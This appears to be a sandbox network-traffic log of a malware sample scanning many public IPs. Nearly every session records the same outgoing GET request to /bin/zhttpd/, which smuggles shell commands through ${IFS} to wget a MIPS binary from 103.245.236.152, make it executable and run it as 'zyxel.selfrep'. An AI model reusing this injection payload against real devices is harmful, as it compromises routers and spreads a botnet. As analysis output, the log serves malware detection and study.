                                        Jan 14, 2024 16:19:01.865026951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9170192.168.2.1339658100.43.114.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865077019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9171192.168.2.1355850129.169.129.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865132093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9172192.168.2.1340476182.38.118.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865207911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9173192.168.2.135126012.223.13.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865269899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9174192.168.2.1341598144.157.224.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865298033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9175192.168.2.134138650.173.29.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865372896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9176192.168.2.135470882.33.180.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865408897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9177192.168.2.135905423.10.22.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865463018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9178192.168.2.1335538194.199.155.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865523100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9179192.168.2.135907285.97.161.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865613937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9180192.168.2.1334820126.229.194.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865674019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9181192.168.2.135803257.119.200.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865717888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9182192.168.2.1336198178.9.243.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865787983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9183192.168.2.1340938153.11.233.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865854979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9184192.168.2.1343460191.55.0.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865935087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9185192.168.2.135288241.175.223.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865950108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9186192.168.2.1346202116.217.99.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.865977049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9187192.168.2.135367476.182.90.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866060019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9188192.168.2.1360434132.164.202.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866115093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9189192.168.2.1335428110.129.17.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866178036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9190192.168.2.13435809.223.177.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866235971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9191192.168.2.135185838.206.150.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866295099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9192192.168.2.1355562171.168.4.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866336107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9193192.168.2.1344882162.177.207.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866400957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9194192.168.2.1352800151.29.178.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.866442919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9195192.168.2.1359838188.48.60.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875199080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9196192.168.2.1350494190.57.206.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875283003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9197192.168.2.1346112156.106.187.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875319958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9198192.168.2.135831477.15.165.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875358105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9199192.168.2.134792845.58.35.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875392914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9200192.168.2.1333590169.58.166.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875448942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9201192.168.2.134683875.37.99.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875475883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9202192.168.2.1355312101.194.215.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875539064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9203192.168.2.1358494122.143.147.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875562906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9204192.168.2.134137038.160.82.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875617027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9205192.168.2.1341630140.168.228.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875674963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9206192.168.2.135331039.83.172.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875688076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9207192.168.2.1337620181.11.153.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875746965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9208192.168.2.133353039.185.247.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875791073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9209192.168.2.134087840.37.238.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875821114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9210192.168.2.1355356151.216.241.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875857115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9211192.168.2.1353710167.110.112.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875914097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9212192.168.2.134852668.32.149.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.875948906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9213192.168.2.1333924208.162.150.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876004934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9214192.168.2.1350416122.97.32.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876035929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9215192.168.2.1335300114.26.21.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876069069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9216192.168.2.1346660200.79.144.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876118898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9217192.168.2.1360614217.189.130.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876156092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9218192.168.2.135113075.244.135.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876205921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9219192.168.2.136071238.76.179.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876240969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9220192.168.2.1344586142.244.124.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876279116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9221192.168.2.1349712142.53.182.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876300097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9222192.168.2.1338558152.182.198.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876358032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9223192.168.2.1355420192.81.255.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876384974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9224192.168.2.1347382131.133.200.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876430988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9225192.168.2.1344266197.121.45.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876431942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9226192.168.2.1339496156.44.57.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876494884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9227192.168.2.134938612.49.97.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876530886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9228192.168.2.133586684.122.192.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876562119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9229192.168.2.1337394147.137.238.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876595020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9230192.168.2.134035442.50.94.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876641035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9231192.168.2.1358154157.142.54.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.876693010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9232192.168.2.13458488.114.80.187443
                                        TimestampBytes transferredDirectionData
